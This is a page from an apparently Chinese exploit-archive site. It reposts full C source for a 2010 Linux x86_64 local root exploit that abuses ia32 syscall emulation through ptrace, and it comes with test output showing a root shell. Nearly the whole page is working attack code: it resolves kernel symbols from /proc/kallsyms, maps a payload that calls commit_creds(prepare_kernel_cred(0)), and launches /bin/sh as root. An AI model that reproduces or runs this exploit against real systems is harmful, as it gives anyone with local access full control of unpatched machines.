首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux 2.6.3* x86_64 2010 local root exploit
来源:r00tw0rm.com 作者:CrosS 发布时间:2011-10-28  
/*
 *
 * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 * 0     _                   __           __       __                     1
 * 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
 * 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
 * 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
 * 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
 * 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
 * 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
 * 1                  \ \____/ >> Exploit database separated by exploit   0
 * 0                   \/___/          type (local, remote, DoS, etc.)    1
 * 1                                                                      0
 * 0  By CrosS                                                            1
 * 1                                                                      0 
 * 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
 *
 *
 * Tested on Linux 2.6.32.1 | Linux 2.6.33.2 | 2.6.32-24-generic | 2.6.37 (2010)
 * Result;
 * # id
 * uid=0(root) gid=0(root)
 *
 * 3xPl017 F0r x86_64 L1nuX k3rn3L ia32syscall 3muLatL47i0N (again) > x86_64 2.6.27+ ( not for 2.6.27 and below ! )
 *
 * If y0u g37 3Rr0R > ./1337
 * symbol table not available, aborting!
 * Process finished < O_o
 * C4usE 3xpl017 Re4dS "/proc/kallsyms" | "/proc/ksyms" , iF n07 4va1bl3! iT g1ve5 ErRoR O_o
 *
 * Upgrade the kernel ksplice without Reboo7, and the vulneRabiLitY is gonE !
 * 
 * Greetz: r0073r(1337day.com) ,r4dc0re ,Sid3^effects | & all members of r00tw0rm.com !
 */
 
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <inttypes.h>
#include <sys/reg.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <string.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int kernelmodecode(void *file, void *vma)
{
	commit_creds(prepare_kernel_cred(0));
	return -1;
}

unsigned long
get_symbol(char *name)
{
	FILE *f;
	unsigned long addr;
	char dummy;
	char sname[512];
	int ret = 0, oldstyle = 0;

	f = fopen("/proc/kallsyms", "r");
	if (f == NULL) {
		f = fopen("/proc/ksyms", "r");
		if (f == NULL)
			return 0;
		oldstyle = 1;
	}

	while (ret != EOF) {
		if (!oldstyle) {
			ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
		} else {
			ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
			if (ret == 2) {
				char *p;
				if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
					continue;
				}
				p = strrchr(sname, '_');
				if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
					p = p - 4;
					while (p > (char *)sname && *(p - 1) == '_') {
						p--;
					}
					*p = '\0';
				}
			}
		}
		if (ret == 0) {
			fscanf(f, "%s\n", sname);
			continue;
		}
		if (!strcmp(name, sname)) {
			printf("ReS0lvEd sYmBoL %s 7o %p\n", name, (void *) addr);
			fclose(f);
			return addr;
		}
	}
	fclose(f);

	return 0;
}

 
static void docall(uint64_t *ptr, uint64_t size)
{
	commit_creds = (_commit_creds) get_symbol("commit_creds");
	if (!commit_creds) {
		printf("sYmb0l 74bl3 no7 ava1labLe, ab0r71n9! Fuck off\n");
		exit(1);
	}

	prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
	if (!prepare_kernel_cred) {
		printf("sYmb0l 74bl3 no7 ava1labLe, ab0r71n9! Fuck off\n");
		exit(1);
	}

        uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);

	printf("MaPpiNg at %lx\n", tmp); 

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
                printf("mMap faUl7\n");
                exit(1);
        }
 
        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;
 
        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");
 
        printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
        execl("/bin/sh", "bin/sh", NULL);
        printf("no /bin/sh ??fuck\n");
        exit(0);
}
 
int main(int argc, char **argv)
{
        int pid, status, set = 0;
        uint64_t rax;
        uint64_t kern_s = 0xffffffff80000000;
        uint64_t kern_e = 0xffffffff84000000;
        uint64_t off = 0x0000000800000101 * 8;
 
        if (argc == 4) {
                docall((uint64_t*)(kern_s + off), kern_e - kern_s);
                exit(0);
        }
 
        if ((pid = fork()) == 0) {
                ptrace(PTRACE_TRACEME, 0, 0, 0);
                execl(argv[0], argv[0], "2", "3", "4", NULL);
                perror("exec fault");
                exit(1);
        }
 
        if (pid == -1) {
                printf("foRk FaUlt(\n");
                exit(1);
        }
 
        for (;;) {
                if (wait(&status) != pid)
                        continue;
 
                if (WIFEXITED(status)) {
                        printf("Pr0ces5 fiNisHeD\n");
                        break;
                }
 
                if (!WIFSTOPPED(status))
                        continue;
 
                if (WSTOPSIG(status) != SIGTRAP) {
                        printf("ProCess rec3iveD si9naL: %d\n", WSTOPSIG(status));
                        break;
                }
 
                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                if (rax == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set = 1;
                	//rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                }
 
                if ((rax == 11) && set) {
                        ptrace(PTRACE_DETACH, pid, 0, 0);
                        for(;;)
                                sleep(10000);
                }
 
                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
        }
 
        return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GTA SA-MP server.cfg Buffer Ov
·Xorg Permission Change
·phpScheduleIt PHP reserve.php
·GFI Faxmaker - Fax Viewer v10.
·Reggae player (.ogg) Local BOF
·Oracle DataDirect ODBC Drivers
·73 bytes sys_execve("/usr/bin/
·Linux Kernel 2.6.13 Local root
·SAP Management Console OSExecu
·NJStar Communicator 3.00 MiniS
·phpLDAPadmin <= 1.2.1.1 (query
·YaTFTPSvr TFTP Server Director
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved